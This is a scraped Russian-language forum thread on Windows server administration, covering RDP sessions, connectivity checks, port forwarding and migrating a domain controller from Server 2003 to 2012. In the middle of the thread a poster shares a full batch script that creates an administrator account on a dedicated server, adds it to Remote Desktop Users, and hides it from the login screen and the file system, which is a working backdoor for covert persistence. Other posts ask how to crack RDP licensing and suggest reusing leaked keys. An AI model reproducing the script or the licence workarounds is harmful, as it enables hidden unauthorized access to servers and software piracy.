Проверь сесии по этой статейки http://dservers.ru/lecheniya-razryva-rdp-sessij-na-dedikax-windows-server-2008/
Ув. Администраторы, подскажите новичку. Я хочу научиться администрировать игровой сервер(GTA). Что для этого надо изучить, желательно с самых основ. Есть небольшой опыт работы в С++.
Например файрволл. Или недействующая (прописанная в браузере) прокся. Или зарезан сайт на межсетевом экране. Или microsoft.com прописан как localhost Куча вариантов на самом деле.
В данной учетки выключен интернет. Посмотри сетевые подключения, сделай пинг до google.com и скажи ответ тут. Пуск->Выполнить->cmd->ping google.com
Как открыть порт на ХР для удаленного доступа к аппарату?.. в модеме Старнет-роутер(подключен через ЛАН) пробовал создание вирт.сервера с открытием порта 2 в брандмаузере(выключен) добавлял в службы открытие порта 3 выключал антивирь 4 регистрировался на НО-айпи создавал хост установил ДЮК И после этих манипуляций проверил сканером портов на компьютере - порт открыт, а онлайн сканер такой как 2айпи говорит закрыт.. возможно что провайдер блокирует?
Если я верно понял у тебя роутер? Сначала попробуй проверь доступ к своему порту в локальной сети а не из интернета. Если приложение/сервер которое ты пробуешь пробросить в мир использует TCP протокол то ты увидешь набор цифр, непонятных символов или просто мерцающий курсор, скорее всего это значит что твой порт открыт, и тебе нужно смотреть где ты ошибся в пробросе этого порта на своем роутере. Просмотр открытых портов; Просмотр открытых портов и приложений которые их используют:
Вот код который должен создавать скрытую учетку на деде(по утверждению автора), автору в асю отписал аська в оффе, может кто поможет его разобрать чтобы понять почему он не создает учетку? Тестировал на дедах win2003 r2 server. Код: echo Add an account "логин" with a password "пароль" Set AdmGroupSID=S-1-5-32-544 Set AdmGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J Set AdmGroup=%AdmGroup:~0,-1% echo Adding to our account in "Administrators" group net user логин пароль /add net localgroup %AdmGroup% логин /add Set RDPGroupSID=S-1-5-32-555 Set RDPGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J Set RDPGroup=%RDPGroup:~0,-1% echo Adding to our account in "Remote desktop users" group net localgroup "%RDPGroup%" логин /add echo Remove password expiration net accounts /maxpwage:unlimited echo If the folder does not exist yet, create it in XP\2003 mkdir "C:\Documents and Settings\логин" echo And put on her attribute "system" attrib +s +a +r +h "C:\Documents and Settings\логин" echo If the folder does not exist yet, create it in 7\2008 mkdir "C:\Users\логин" echo And put on her attribute "system" attrib +s +a +r +h "C:\Users\логин" echo Hide the account from the Winlogon reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v логин /t REG_DWORD /d 0 /f pause
Кинь сюда хоть вывод после работы этого всего дела. Вроде все верно, попробуй выполни команды последовательно глянь на каком этапе он стопориться.
RDP лицензии На win serv 2008 r2 (x64) помогите крякнуть RDP terminal server. В начале мне дало 120 дней триала, но они неумолимо подходят к концу. Нашел маны на 2003, но не то походу. Подскажите кто сталкивался =)
Делал методом 2003-го - работает. Где-то поднимал гипер-в(не только для этой задачи), на нем в минимуме 2003 и там сервер лицензирования под рдп.
Три года назад находил ключик в инете и успешно активировал несколько десятков терминальных лицензий. Попробуй, может еще не все перебанили.
Есть 2003 стандарт (единственный контроллер домена, в режиме совместимости 2000), старенький медленно умирающий hp proliant. Тут недавно появился 2012 стандарт и вот хочу произвести миграцию. Думаю начать надо с того что DC на 2003 перевести в режим совместимости 2003. Дальше я нашел подробную инструкцию по миграции домена с 2003 до 2008. Теперь вот думаю есть ли разница по переходу между 2008 и 2012, и какие подводные камни могут быть? Мануалов и инструкций по миграции и переходу с 2003 на 2008 полно, а вот с 2003 на 2012 я толком и не нашел. И что будет лучше, иметь два контроллера домена(для отказоустойчивости) или один на 2012? Рабочие ОС в домене: win XP,7,8 Есть ли у кого опыт по миграции с 2003 на 2012, поделитесь советами.